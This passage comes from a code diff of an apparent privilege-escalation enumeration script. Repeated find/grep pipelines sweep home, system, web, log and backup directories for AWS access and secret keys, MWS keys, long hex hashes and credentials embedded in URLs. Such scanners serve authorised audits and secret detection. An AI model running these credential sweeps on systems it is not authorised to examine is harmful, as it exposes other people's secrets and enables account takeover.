-path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait echo '' print_2title "Searching APIs" -print_3title "Searching AWS Client ID (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +print_3title_no_nl "Searching AWS Client ID (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching AWS MWS Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +print_3title_no_nl "Searching AWS MWS Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching AWS Secret Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +print_3title_no_nl "Searching AWS Secret Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Basic Auth Credentials (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE 